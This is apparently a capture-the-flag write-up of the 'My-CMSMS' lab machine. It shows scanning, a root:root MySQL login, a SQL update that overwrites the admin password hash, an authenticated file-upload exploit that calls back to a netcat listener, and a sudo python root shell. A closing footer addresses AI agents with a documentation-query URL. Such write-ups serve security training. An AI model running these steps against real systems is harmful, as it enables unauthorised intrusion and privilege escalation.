# My-CMSMS ## Nmap ``` sudo nmap 192.168.152.74 -p- -sS -sV PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 3306/tcp open mysql MySQL 8.0.19 33060/tcp open mysqlx? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` Checking out port 80 takes us to the default page for CMS made simple. ![](/files/-MXRW0POHtOX2NthADll) I then run dirsearch.py against the host which also discovered phpmyadmin which was locked behind http-basic-auth. ``` python3 dirsearch.py -u http://192.168.152.74 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url ``` ![](/files/-MXRbJc4ysb2y3lFvzir) I attempted to bruteforce the login for phpmyadmin and for CMSMS login. I was unable to find any valid credentials for either. I was however, able to login to MySQL remotely with the credentials `root:root`. ``` mysql -u root -p -h 192.168.152.74 ``` ![](/files/-MXRbkpqPbXw1iblAhCx) From here we can view the databases and move into the cmsms\_db database. ``` use cmsms_db; show tables; ``` ![](/files/-MXRcDnoFmk1b6dHKBbS) Looking at the tables that exists in the database we select all columns from cms\_users table. ``` select * from cms_users; ``` ![](/files/-MXRcPlfBcYKYeO6lG7s) This reveals a MD5 password hash for the admin account. I was unable to crack this with several word lists however. As we are the root account on MySQL we can instead change the password to something we know and use this to login to CMSMS. Run the following command to create a new password of 'weakpass' for the admin user: `update cms_users set password = (select md5(CONCAT(IFNULL((SELECT sitepref_value FROM cms_siteprefs WHERE sitepref_name = 'sitemask'),''),'weakpass'))) where username = 'admin'` {% hint style="info" %} {% endhint %} The password has now changed: ![](/files/-MXRgE0vIKhPeEyk_6Ob) We can then move over to the /admin/ directory in the browser and login with the new credentials. ![](/files/-MXRgUBm93MvJyhLhNyj) Searching for exploits on CMSMS now that we are authenticated gives a few results. ![](/files/-MXRiLxXGRjxEINH-fNF) As we are running version 2.2.13 I will try the Arbitary file upload for version 2.2.14. {% embed url="" %} Once the python script was downloaded I executed with the following syntax: ``` python3 48779.py --url http://192.168.152.74/admin/login.php -u admin -p weakpass -lhost 192.168.49.152 -l 80 ``` ![](/files/-MXRihC0bsjTFQvEGoEa) When ready I set a `netcat` listener and prompted the script to continue resulting in a shell as www-data. ![](/files/-MXRipKf0pcf68IHkrS5) Moving around the target machine we have a .htpasswd file hidden in `/var/www/html/admin/`. When running `cat` on the file we get the value `TUZaRzIzM1ZPSTVGRzJESk1WV0dJUUJSR0laUT09PT0=`. From here we can decode with base64 then base32 as this string is double encoded. ![](/files/-MXRxs3tSWlV10YxHN1W) We can then use `su` to switch to the armour account and login with the password we have discovered. ![](/files/-MXRyFu1J1Qps-Z_K0yO) Checking `sudo -l` shows we can run python as root without declaring a password. ![](/files/-MXRyPcnD8gNC-53ELMX) We can then spawn a root shell with python. ``` sudo python -c 'import os; os.system("/bin/sh")' ``` ![](/files/-MXRyhTvXbcaGiVxhD_0) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/my-cmsms.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.